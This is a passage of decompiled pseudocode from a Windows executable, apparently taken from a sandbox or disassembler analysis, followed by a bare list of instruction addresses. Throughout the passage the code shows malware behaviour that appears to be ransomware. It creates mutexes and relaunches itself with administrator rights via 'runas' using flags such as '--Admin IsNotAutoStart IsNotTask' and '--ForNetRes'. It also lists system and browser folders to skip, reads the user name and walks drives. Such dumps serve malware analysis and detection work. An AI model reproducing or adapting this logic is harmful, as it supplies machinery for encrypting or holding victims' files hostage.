															L00422587(_a80);
															_t1268 = _t1268 + 4;
														}
													}
												}
												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
												_t1292 = _t1268 + 4;
												_t1244 = 0;
												__eflags = 0;
												do {
													_t846 = _v16;
													_a20 =  *(_t846 + _t1244 * 4);
													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
													E0042B420(_t950, 0, _t1215);
													_t1292 = _t1292 + 0x10;
													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
													lstrcatW(0x513290, _t950);
													_t1244 = _t1244 + 1;
													__eflags = _t1244 - 0xa;
												} while (_t1244 < 0xa);
												__eflags = lstrlenW(0x51a7c0);
												if(__eflags <= 0) {
													E0040E760(0x513278, __eflags);
													 *0x529225 = _a16;
													 *0x529226 = _a28;
													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
													 *0x513260 = _t856;
													WaitForSingleObject(_t856, 0xffffffff);
												}
												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
											}
											goto L82;
										} else {
											__eflags = _t950;
											if(_t950 != 0) {
												goto L62;
											} else {
												__eflags =  *0x513234 - _t950;
												if(__eflags != 0) {
													L81:
													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
													L82:
													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
													_t1231 = _v16;
													_t1269 = _t1268 + 4;
													_a340 = 0xf;
													_t1204 = 0;
													__eflags = 0;
													_a336 = 0;
													_a320 = 0;
													do {
														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
														__eflags =  *_t1167;
														if( *_t1167 != 0) {
															_t986 = _t1167;
															_t950 = _t986 + 1;
															do {
																_t585 =  *_t986;
																_t986 = _t986 + 1;
																__eflags = _t585;
															} while (_t585 != 0);
															_t987 = _t986 - _t950;
															__eflags = _t987;
														} else {
															_t987 = 0;
														}
														_push(_t987);
														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
														_t1204 = _t1204 + 1;
														__eflags = _t1204 - 0xa;
													} while (_t1204 < 0xa);
													_t1270 = _t1269 - 0x18;
													_v20 = 0;
													_t1168 = _t1270;
													_t1205 =  &_v20;
													 *(_t1168 + 0x14) = 7;
													 *(_t1168 + 0x10) = 0;
													 *_t1168 = 0;
													__eflags =  *0x51a7c0;
													if( *0x51a7c0 != 0) {
														_t989 = 0x51a7c0;
														_t201 =  &(_t989[1]); // 0x51a7c2
														_t1231 = _t201;
														do {
															_t588 =  *_t989;
															_t989 =  &(_t989[1]);
															__eflags = _t588;
														} while (_t588 != 0);
														_t990 = _t989 - _t1231;
														__eflags = _t990;
														_t991 = _t990 >> 1;
													} else {
														_t991 = 0;
													}
													_push(_t991);
													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
													_t590 = E00412840( &_v20, 0);
													_t1271 = _t1270 + 0x18;
													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
														_t590 =  *_t590;
													}
													E00410FC0(_t590, _t1205);
													__eflags = _a4 - 0x10;
													_t1232 = _v28;
													if(_a4 >= 0x10) {
														L00422587(_v16);
														_t1271 = _t1271 + 4;
													}
													_t592 = lstrlenA(_v24);
													__eflags = _t592 - 0x20;
													if(_t592 == 0x20) {
														_t1272 = _t1271 - 0x18;
														_t1171 = _t1272;
														_t952 = 0;
														 *(_t1171 + 0x14) = 7;
														 *(_t1171 + 0x10) = 0;
														 *_t1171 = 0;
														__eflags =  *0x51a7c0;
														if( *0x51a7c0 != 0) {
															_t995 = 0x51a7c0;
															_t210 =  &(_t995[1]); // 0x51a7c2
															_t1205 = _t210;
															do {
																_t594 =  *_t995;
																_t995 =  &(_t995[1]);
																__eflags = _t594;
															} while (_t594 != 0);
															_t996 = _t995 - _t1205;
															__eflags = _t996;
															_t997 = _t996 >> 1;
														} else {
															_t997 = 0;
														}
														_push(_t997);
														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
														_t596 = E00412840( &_v24, _t952);
														_t1273 = _t1272 + 0x18;
														__eflags = _t596[0x14] - 0x10;
														if(_t596[0x14] >= 0x10) {
															_t596 =  *_t596;
														}
														lstrcpyA(_t1232 + 0x28, _t596);
														__eflags = _v0 - 0x10;
														if(_v0 >= 0x10) {
															L00422587(_v20);
															_t1273 = _t1273 + 4;
														}
														__eflags =  *0x521cf0;
														if( *0x521cf0 != 0) {
															_t1000 = 0x521cf0;
															_t216 =  &(_t1000[1]); // 0x521cf2
															_t1173 = _t216;
															do {
																_t599 =  *_t1000;
																_t1000 =  &(_t1000[1]);
																__eflags = _t599;
															} while (_t599 != 0);
															_t1001 = _t1000 - _t1173;
															__eflags = _t1001;
															_t1002 = _t1001 >> 1;
														} else {
															_t1002 = 0;
														}
														_push(_t1002);
														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
														_t1233 = _v36;
														_t1274 = _t1273 + 4;
														_a248 = 0xf;
														_t1206 = 0;
														__eflags = 0;
														_a244 = 0;
														_a228 = 0;
														do {
															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
															__eflags =  *_t1175;
															if( *_t1175 != 0) {
																_t1005 = _t1175;
																_t952 = _t1005 + 1;
																do {
																	_t602 =  *_t1005;
																	_t1005 = _t1005 + 1;
																	__eflags = _t602;
																} while (_t602 != 0);
																_t1006 = _t1005 - _t952;
																__eflags = _t1006;
															} else {
																_t1006 = 0;
															}
															_push(_t1006);
															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
															_t1206 = _t1206 + 1;
															__eflags = _t1206 - 0xa;
														} while (_t1206 < 0xa);
														_t1275 = _t1274 - 0x18;
														_t1008 = _t1275;
														_push(0xffffffff);
														 *(_t1008 + 0x14) = 0xf;
														 *(_t1008 + 0x10) = 0;
														 *_t1008 = 0;
														E00413FF0(0, _t1008,  &_a228, 0);
														_t1207 = E00412900( &_v40, 0);
														_t955 = _v52 + 0x828;
														_t1276 = _t1275 + 0x18;
														__eflags = _t955 - _t1207;
														if(_t955 != _t1207) {
															__eflags = _t955[5] - 8;
															if(_t955[5] >= 8) {
																L00422587( *_t955);
																_t1276 = _t1276 + 4;
															}
															_t955[5] = 7;
															_t955[4] = 0;
															 *_t955 = 0;
															__eflags = _t1207[5] - 8;
															if(_t1207[5] >= 8) {
																 *_t955 =  *_t1207;
																 *_t1207 = 0;
															} else {
																_t839 = _t1207[4] + 1;
																__eflags = _t839;
																if(_t839 != 0) {
																	E004205A0(_t955, _t1207, _t839 + _t839);
																	_t1276 = _t1276 + 0xc;
																}
															}
															_t955[4] = _t1207[4];
															_t955[5] = _t1207[5];
															__eflags = 0;
															_t1207[5] = 7;
															_t1207[4] = 0;
															 *_t1207 = 0;
														}
														__eflags = _v12 - 8;
														if(__eflags >= 0) {
															L00422587(_v32);
															_t1276 = _t1276 + 4;
														}
														E0040EF50(0x50fef0,  &_v40, __eflags, 0xa);
														_t1234 = _v40;
														_t1277 = _t1276 + 4;
														_a220 = 0xf;
														_t1208 = 0;
														__eflags = 0;
														_a216 = 0;
														_a200 = 0;
														do {
															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
															__eflags =  *_t1178;
															if( *_t1178 != 0) {
																_t1011 = _t1178;
																_t955 = _t1011 + 1;
																do {
																	_t608 =  *_t1011;
																	_t1011 = _t1011 + 1;
																	__eflags = _t608;
																} while (_t608 != 0);
																_t1012 = _t1011 - _t955;
																__eflags = _t1012;
															} else {
																_t1012 = 0;
															}
															_push(_t1012);
															E00413EA0(_t955,  &_a200, _t1208, _t1234, _t1178);
															_t1208 = _t1208 + 1;
															__eflags = _t1208 - 0xa;
														} while (_t1208 < 0xa);
														_t1278 = _t1277 - 0x18;
														_t1014 = _t1278;
														_push(0xffffffff);
														 *(_t1014 + 0x14) = 0xf;
														 *(_t1014 + 0x10) = 0;
														 *_t1014 = 0;
														E00413FF0(0, _t1014,  &_a196, 0);
														_t1209 = E00412900( &_v48, 0);
														_t958 = _v60 + 0x840;
														_t1279 = _t1278 + 0x18;
														__eflags = _t958 - _t1209;
														if(_t958 != _t1209) {
															__eflags = _t958[5] - 8;
															if(_t958[5] >= 8) {
																L00422587( *_t958);
																_t1279 = _t1279 + 4;
															}
															_t958[5] = 7;
															_t958[4] = 0;
															 *_t958 = 0;
															__eflags = _t1209[5] - 8;
															if(_t1209[5] >= 8) {
																 *_t958 =  *_t1209;
																 *_t1209 = 0;
															} else {
																_t828 = _t1209[4] + 1;
																__eflags = _t828;
																if(_t828 != 0) {
																	E004205A0(_t958, _t1209, _t828 + _t828);
																	_t1279 = _t1279 + 0xc;
																}
															}
															_t958[4] = _t1209[4];
															_t958[5] = _t1209[5];
															__eflags = 0;
															_t1209[5] = 7;
															_t1209[4] = 0;
															 *_t1209 = 0;
														}
														__eflags = _v20 - 8;
														if(__eflags >= 0) {
															L00422587(_v40);
															_t1279 = _t1279 + 4;
														}
														E0040EF50(0x50ff20,  &_v48, __eflags, 0xa);
														_t1235 = _v48;
														_t1280 = _t1279 + 4;
														_a284 = 0xf;
														_t1210 = 0;
														__eflags = 0;
														_a280 = 0;
														_a264 = 0;
														do {
															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
															__eflags =  *_t1181;
															if( *_t1181 != 0) {
																_t1017 = _t1181;
																_t958 = _t1017 + 1;
																do {
																	_t614 =  *_t1017;
																	_t1017 = _t1017 + 1;
																	__eflags = _t614;
																} while (_t614 != 0);
																_t1018 = _t1017 - _t958;
																__eflags = _t1018;
															} else {
																_t1018 = 0;
															}
															_push(_t1018);
															E00413EA0(_t958,  &_a264, _t1210, _t1235, _t1181);
															_t1210 = _t1210 + 1;
															__eflags = _t1210 - 0xa;
														} while (_t1210 < 0xa);
														_t1281 = _t1280 - 0x18;
														_t1020 = _t1281;
														_push(0xffffffff);
														 *(_t1020 + 0x14) = 0xf;
														 *(_t1020 + 0x10) = 0;
														 *_t1020 = 0;
														E00413FF0(0, _t1020,  &_a260, 0);
														_t618 = E00412900( &_v56, 0);
														_t1236 = _v68;
														_t1211 = _t618;
														_t1282 = _t1281 + 0x18;
														_t960 = _t1236 + 0x870;
														__eflags = _t960 - _t1211;
														if(_t960 != _t1211) {
															__eflags = _t960[5] - 8;
															if(_t960[5] >= 8) {
																L00422587( *_t960);
																_t1282 = _t1282 + 4;
															}
															_t960[5] = 7;
															_t960[4] = 0;
															 *_t960 = 0;
															__eflags = _t1211[5] - 8;
															if(_t1211[5] >= 8) {
																 *_t960 =  *_t1211;
																 *_t1211 = 0;
															} else {
																_t817 = _t1211[4] + 1;
																__eflags = _t817;
																if(_t817 != 0) {
																	E004205A0(_t960, _t1211, _t817 + _t817);
																	_t1282 = _t1282 + 0xc;
																}
															}
															_t960[4] = _t1211[4];
															_t960[5] = _t1211[5];
															__eflags = 0;
															_t1211[5] = 7;
															_t1211[4] = 0;
															 *_t1211 = 0;
														}
														__eflags = _v28 - 8;
														if(_v28 >= 8) {
															L00422587(_v48);
															_t1282 = _t1282 + 4;
														}
														_push(0xb);
														_v28 = 7;
														_v32 = 0;
														_v48 = 0;
														E00415C10(_t960,  &_v48, _t1211, _t1236, L"C:\\Windows\\");
														_t1237 = _t1236 + 0x888;
														E00413580(_t960, _t1236 + 0x888,  &_v56);
														__eflags = _v40 - 8;
														if(_v40 >= 8) {
															L00422587(_v52);
															_t1282 = _t1282 + 4;
														}
														_push(0x27);
														_v32 = 7;
														_v36 = 0;
														_v52 = 0;
														E00415C10(_t960,  &_v52, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v60);
														__eflags = _v44 - 8;
														if(_v44 >= 8) {
															L00422587(_v56);
															_t1282 = _t1282 + 4;
														}
														_push(0x29);
														_v36 = 7;
														_v40 = 0;
														_v56 = 0;
														E00415C10(_t960,  &_v56, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v64);
														__eflags = _v48 - 8;
														if(_v48 >= 8) {
															L00422587(_v60);
															_t1282 = _t1282 + 4;
														}
														_push(0x1e);
														_v40 = 7;
														_v44 = 0;
														_v60 = 0;
														E00415C10(_t960,  &_v60, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
														E00413580(_t960, _t1237,  &_v68);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v64);
															_t1282 = _t1282 + 4;
														}
														_push(0x21);
														_v44 = 7;
														_v48 = 0;
														_v64 = 0;
														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v72);
														__eflags = _v56 - 8;
														if(_v56 >= 8) {
															L00422587(_v68);
															_t1282 = _t1282 + 4;
														}
														_push(0x23);
														_v48 = 7;
														_v52 = 0;
														_v68 = 0;
														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v76);
														__eflags = _v60 - 8;
														if(_v60 >= 8) {
															L00422587(_v72);
															_t1282 = _t1282 + 4;
														}
														_push(0x18);
														_v52 = 7;
														_v56 = 0;
														_v72 = 0;
														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files\\Google\\");
														E00413580(_t960, _t1237,  &_v80);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v76);
															_t1282 = _t1282 + 4;
														}
														E00413100( &_v76, _t1211, L"D:\\Windows\\");
														_v52 = E00415200( &_v36);
														_t353 = E00415610(_t648) + 0x880; // 0x880
														E00413580(_t960, _t353,  &_v80);
														E00413210( &_v84);
														E00413100( &_v84, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
														_t1212 = E00413920( &_v44);
														_t358 = _t1212 + 0x880; // 0x880
														_t961 = _t358;
														E00413580(_t358, _t358,  &_v88);
														E00413210( &_v92);
														E00413100( &_v92, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v96);
														E00413210( &_v100);
														E00413100( &_v100, _t1212, L"D:\\Program Files (x86)\\Google\\");
														E00413580(_t961, _t961,  &_v104);
														E00413210( &_v108);
														E00413100( &_v108, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t961, _t961,  &_v112);
														E00413210( &_v116);
														E00413100( &_v116, _t1212, L"D:\\Program Files\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v120);
														E00413210( &_v124);
														E00413100( &_v124, _t1212, L"D:\\Program Files\\Google\\");
														E00413580(_t961, _t961,  &_v128);
														E00413210( &_v132);
														_t375 = _t1212 + 0x868; // 0x868
														_t1238 = _t375;
														_t677 = E00413490(_t375, 0);
														__eflags =  *_t677 - 0x2e;
														if( *_t677 != 0x2e) {
															_t800 = E0041CDD0( &_v76, _t1238);
															_t1282 = _t1282 + 4;
															E004131D0(_t1238, _t800);
															E00413210( &_v80);
														}
														E0041C140(E00413560( &_v76), _t961);
														E00413600( &_v80);
														E0040EF50(0x50ff50,  &_v92, __eflags, 0xa);
														_t1283 = _t1282 + 4;
														E00412C20( &_a300);
														_t962 = _v92;
														_t1239 = 0;
														do {
															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
															_t1239 = _t1239 + 1;
															__eflags = _t1239 - 0xa;
														} while (_t1239 < 0xa);
														_v8 = 0x100;
														GetUserNameW( &_a388,  &_v8);
														E00413930( &_v76);
														_t1284 = _t1283 - 0x18;
														E00412C40(_t1284, _t1212, "|");
														_t1285 = _t1284 - 0x18;
														E00412BF0(_t1285,  &_a300);
														E0040ECB0( &_v84);
														_t1286 = _t1285 + 0x30;
														_v100 =  *((intOrPtr*)(E0041C410( &_v84,  &_v96)));
														_t697 = E0041C450( &_v104, E0041C420( &_v88,  &_v96));
														__eflags = _t697;
														if(_t697 != 0) {
															do {
																_t782 = E00412F40(E0041C430( &_v88));
																_t1290 = _t1286 - 0x18;
																E00412C40(_t1290, _t1212, _t782);
																_t784 = E00412900( &_v8, 0);
																_t400 = _t1212 + 0x880; // 0x880
																E00413580(_t962, _t400, _t784);
																E00413210( &_v12);
																_t788 = E00413100( &_a96, _t1212,  &_a380);
																_t789 = E00413100( &_v16, _t1212, L"%username%");
																_t405 = _t1212 + 0x880; // 0x880
																_t1239 = _t789;
																_t790 = E00413660(_t405);
																_t406 = _t1212 + 0x880; // 0x880
																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
																_t1286 = _t1290 + 0x1c;
																E00413210( &_v24);
																E00413210( &_a84);
																E0041C440( &_v108);
																_t799 = E0041C450( &_v112, E0041C420( &_v96,  &_v104));
																__eflags = _t799;
															} while (_t799 != 0);
														}
														_t414 = _t1212 + 0x880; // 0x880
														E004136C0(_t414,  &_a204);
														E0040CA70(_t962,  &_v36, _t1212, _t1239);
														_t416 = _t1212 + 0x850; // 0x850
														E004130B0(_t1286 - 0x18, _t416);
														E0040C740();
														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg");
														E0041BA10(_a4);
														_t707 = E0041BA80(_a4);
														__eflags = _t707;
														if(_t707 != 0) {
															 *(_t1212 + 0x8c0) = 0;
															 *_t1212 =  *0x51323c;
															E00413560( &_v4);
															E00410A50( &_v4);
															E0041C140(E00413560( &_v32),  &_v4);
															E00413600( &_v36);
															E00413100( &_v36, _t1212, L"F:\\");
															E00413580(_t962,  &_v12,  &_v40);
															E00413210( &_v44);
															E00413640( &_v16,  &_v100);
															_t723 = E00413900( &_v108, E00413650( &_v20,  &_v48));
															__eflags = _t723;
															if(_t723 != 0) {
																_t966 = _v48;
																do {
																	E0041C330(_t1212, _t1239, E0041F110( &_v84));
																	E0041C240(_t1212, _t1239, E00419D10( &_a896));
																	L214();
																	_t770 = E0041C2F0();
																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
																	_t1239 = _t770;
																	E0041B8B0(_t966, _t1239, _t966);
																	_t773 = E004134B0(E0041C470( &_v100));
																	_t441 = _t1239 + 0x8a4; // 0x8a4
																	E00413260(_t441, _t1212, _t773);
																	 *((char*)(_t1239 + 0x8e0)) = 1;
																	E0041FA10(E0041C3D0(), _t1239);
																	E004138D0( &_v108);
																	_t780 = E00413900( &_v112, E00413650( &_v24,  &_v52));
																	__eflags = _t780;
																} while (_t780 != 0);
															}
															 *0x529238 =  *0x51323c;
															E0041FDC0(0x529238);
															_t727 = GetMessageW( &_a272, 0, 0, 0);
															__eflags = _t727;
															if(_t727 != 0) {
																do {
																	TranslateMessage( &_a276);
																	DispatchMessageW( &_a276);
																	_t765 = GetMessageW( &_a276, 0, 0, 0);
																	__eflags = _t765;
																} while (_t765 != 0);
															}
															_t728 =  *0x513250;
															__eflags = _t728;
															if(_t728 != 0) {
																PostThreadMessageW(_t728, 0x12, 0, 0);
																do {
																	_t754 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t754;
																	if(_t754 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t759 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t759;
																		} while (_t759 != 0);
																	}
																	_t755 = WaitForSingleObject( *0x513240, 0xa);
																	__eflags = _t755 - 0x102;
																} while (_t755 == 0x102);
															}
															_t729 =  *0x51324c;
															__eflags = _t729;
															if(_t729 != 0) {
																PostThreadMessageW(_t729, 0x12, 0, 0);
																do {
																	_t746 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t746;
																	if(_t746 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t751 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t751;
																		} while (_t751 != 0);
																	}
																	_t747 = WaitForSingleObject( *0x513248, 0xa);
																	__eflags = _t747 - 0x102;
																} while (_t747 == 0x102);
															}
															__eflags =  *0x513234;
															_t730 =  *0x513230;
															if( *0x513234 == 0) {
																_t730 =  *0x513238;
															}
															__eflags = _t730;
															if(_t730 != 0) {
																CloseHandle(_t730);
															}
															_t1242 = _a284;
															E00413600( &_v4);
														} else {
															_t1242 = 0;
														}
														E004139D0( &_v76);
														E00412D50( &_a304);
														E00412D50( &_a228);
														E00412D50( &_a156);
														E00412D50( &_a180);
													} else {
														_t1242 = 0;
													}
													E00412D50( &_a252);
												} else {
													_t868 = GetVersion();
													__eflags = _t868 - 5;
													if(_t868 <= 5) {
														goto L60;
													} else {
														lstrcpyW( &_a968, L"--Admin");
														lstrcatW( &_a968, L" IsNotAutoStart");
														lstrcatW( &_a968, L" IsNotTask");
														E0042B420( &_a400, 0, 0x38);
														_a396.cbSize = 0x3c;
														_a412 =  &_a3248;
														_t1268 = _t1268 + 0xc;
														_a400 = 0;
														_a416 =  &_a968;
														_t879 = _t1230 + 0x10;
														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
															_t879 =  *_t879;
														}
														_a420 = _t879;
														_a424 = 5;
														_a408 = L"runas";
														_t881 = ShellExecuteExW( &_a396); // executed
														__eflags = _t881;
														if(_t881 == 0) {
															L61:
															_t581 = _a16;
															goto L62;
														} else {
															_t1242 = 0;
														}
													}
												}
											}
										}
									}
									E00413210( &_a204);
									E00413210( &_a132);
									E00412D50( &_a56);
									E00413B10( &_a44);
									return _t1242;
								} else {
									__eflags = 0;
									E00413B10( &_a116);
									return 0;
								}
							} else {
								_t1145 = _a28;
								_v12 = _t1145 + 0x14;
								_t968 = _t1145 + 0xc;
								_a24 = _t1145 + 0x10;
								while(1) {
									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
									_t1264 = _t1264 + 8;
									__eflags = _t895;
									_t896 = _a28;
									if(_t895 != 0) {
										goto L17;
									}
									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
									__eflags = lstrcmpW(L"IsTask",  *_t968);
									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
									 *0x513235 = 1;
									_t1201 = _t1201 + 2;
									_a24 =  &(_a24[2]);
									_t968 =  &(_t968[2]);
									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
									_t923 =  &(_v12[2]);
									L25:
									_a24 =  &(_a24[1]);
									_t1201 = _t1201 + 1;
									_t968 =  &(_t968[1]);
									_v12 =  &(_t923[1]);
									__eflags = _t1201 - _a36;
									if(_t1201 < _a36) {
										_t1145 = _a28;
										continue;
									} else {
										goto L26;
									}
									goto L235;
									L17:
									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
									_t1264 = _t1264 + 8;
									__eflags = _t897;
									_t898 = _a28;
									if(_t897 != 0) {
										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
										_t1264 = _t1264 + 8;
										__eflags = _t899;
										if(_t899 != 0) {
											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
											_t1264 = _t1264 + 8;
											__eflags = _t901;
											if(_t901 != 0) {
												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
												_t1264 = _t1264 + 8;
												__eflags = _t903;
												if(_t903 == 0) {
													_t969 = _a28;
													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
													_a40 = _t1248;
													lstrcpyW(0x51a7c0,  *(_t969 + 8 + _t1201 * 4));
													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
													while(1) {
														_t1220 = OpenProcess(0x100000, 0, _t1248);
														__eflags = _t1220;
														if(_t1220 == 0) {
															break;
														}
														_t916 = WaitForSingleObject(_t1220, 0x1f4);
														_t917 = CloseHandle(_t1220);
														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
															break;
														} else {
															_t919 = E00411AB0();
															__eflags = _t919;
															if(_t919 != 0) {
																GlobalFree(_t969);
																__eflags = 0;
																E00413B10( &_a116);
																return 0;
															} else {
																Sleep(1);
																_t1248 = _a40;
																continue;
															}
														}
														goto L235;
													}
													E00411CD0(_t969, 0, 0);
													 *0x529224 = 0;
													_t1249 = GetCurrentProcess();
													_a40 = 0;
													GetExitCodeProcess(_t1249,  &_a40);
													TerminateProcess(_t1249, _a40);
													CloseHandle(_t1249);
													__eflags = 0;
													E00413B10( &_a116);
													return 0; // executed
												} else {
													goto L24;
												}
											} else {
												_a20 = 1;
												goto L24;
											}
										} else {
											_a32 = 1;
											L24:
											_t923 = _v12;
											goto L25;
										}
									} else {
										 *0x513234 = 1;
										lstrcpyW(0x51a7c0,  *(_t898 + 4 + _t1201 * 4));
										lstrcpyW(0x521cf0,  *_t968);
										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
										__eflags = lstrcmpW(L"IsTask",  *_v12);
										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
										_a24 =  &(_a24[4]);
										_t1201 = _t1201 + 4;
										_t968 =  &(_t968[4]);
										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
										_t923 =  &(_v12[4]);
										goto L25;
									}
									goto L235;
								}
							}
						}
					}
				} else {
					E004124E0();
					return 0;
				}
				L235:
			}

0x00419f93
0x00419f9b
0x00419fa3
0x00419fa5
0x00419fa6
0x00419fab
0x00419fb2
0x00419fc4
0x00419fd2
0x00419fda
0x00419fe0
0x00419fe2
0x00419fe4
0x00419fe4
0x00419fe6
0x00419ff1
0x00419ff9
0x0041a005
0x0041a00a
0x0041a015
0x0041a017
0x0041a019
0x0041a01c
0x0041b669
0x0041b66e
0x00000000
0x0041a022
0x0041a02a
0x0041a030
0x0041a036
0x0041a038
0x0041a03d
0x0041a048
0x0041a04d
0x0041a058
0x0041a05a
0x0041a05c
0x0041a05f
0x0041b673
0x0041b673
0x0041b678
0x0041b67d
0x0041b67e
0x0041b67f
0x0041b680
0x0041b681
0x0041b683
0x0041b68a
0x0041b692
0x0041b697
0x0041b697
0x0041b69a
0x0041b6a4
0x0041b6ae
0x0041b6b5
0x0041b6bc
0x0041b6c4
0x0041b6c9
0x0041b6c9
0x0041b6ce
0x0041b6d8
0x0041b6e2
0x0041b6e9
0x0041b6ef
0x0041b6f1
0x0041b6fa
0x0041b705
0x0041b70a
0x0041b70d
0x0041b717
0x0041b721
0x0041b721
0x0041b72b
0x0041b731
0x0041b733
0x0041b73c
0x0041b747
0x0041b74c
0x0041b74f
0x0041b759
0x0041b763
0x0041b763
0x0041b76d
0x0041b773
0x0041b775
0x0041b77e
0x0041b789
0x0041b78e
0x0041b791
0x0041b79b
0x0041b7a5
0x0041b7a5
0x0041b7af
0x0041b7b6
0x0041b7be
0x0041b7c3
0x0041b7c3
0x0041b7c8
0x0041b7d2
0x0041b7dc
0x0041b7e3
0x0041b7ea
0x0041b7f2
0x0041b7f7
0x0041b7f7
0x0041b7fc
0x0041b806
0x0041b810
0x0041b817
0x0041b81e
0x0041b826
0x0041b82b
0x0041b82b
0x0041b830
0x0041b83a
0x0041b844
0x0041b84b
0x0041b852
0x0041b85a
0x0041b85f
0x0041b85f
0x0041b864
0x0041b86e
0x0041b878
0x0041b87f
0x0041b883
0x0041b888
0x0041b88d
0x0041b890
0x0041b897
0x0041b899
0x0041b8a0
0x0041b8a5
0x0041a065
0x0041a06d
0x0041a073
0x0041a079
0x0041a07b
0x0041a08f
0x0041a099
0x0041a09d
0x0041a09f
0x0041a0a3
0x0041a0a7
0x0041a0ac
0x0041a0bb
0x0041a0c2
0x0041a0c8
0x0041a0ce
0x0041a0e7
0x0041a0f3
0x0041a0fb
0x0041a100
0x0041a10a
0x0041a10c
0x0041a10e
0x0041a112
0x0041a116
0x0041a11b
0x0041a11b
0x0041a11e
0x0041a120
0x0041a127
0x0041a130
0x0041a13b
0x0041a13b
0x0041a140
0x0041a148
0x0041a151
0x0041a156
0x0041a156
0x0041a159
0x0041a16d
0x0041a173
0x0041a181
0x0041a187
0x0041a18c
0x0041a190
0x0041a33d
0x0041a341
0x0041a347
0x0041a34e
0x0041a45c
0x0041a461
0x0041a354
0x0041a359
0x0041a359
0x0041a464
0x0041a48a
0x0041a48f
0x0041a493
0x0041a496
0x0041a4a1
0x0041a4a1
0x0041a4a3
0x0041a4ae
0x0041a4b6
0x0041a4b6
0x0041a4b9
0x0041a4bc
0x0041a4c2
0x0041a4c7
0x0041a4d0
0x0041a4d0
0x0041a4d2
0x0041a4d3
0x0041a4d3
0x0041a4d7
0x0041a4d7
0x0041a4be
0x0041a4be
0x0041a4be
0x0041a4db
0x0041a4e4
0x0041a4e9
0x0041a4ea
0x0041a4ea
0x0041a4ef
0x0041a4fe
0x0041a506
0x0041a50c
0x0041a51b
0x0041a529
0x0041a531
0x0041a538
0x0041a547
0x0041a553
0x0041a55e
0x0041a563
0x0041a567
0x0041a56a
0x0041a56e
0x0041a570
0x0041a6ea
0x0041a6ea
0x0041a576
0x0041a576
0x0041a578
0x00000000
0x0041a57e
0x0041a580
0x0041a588
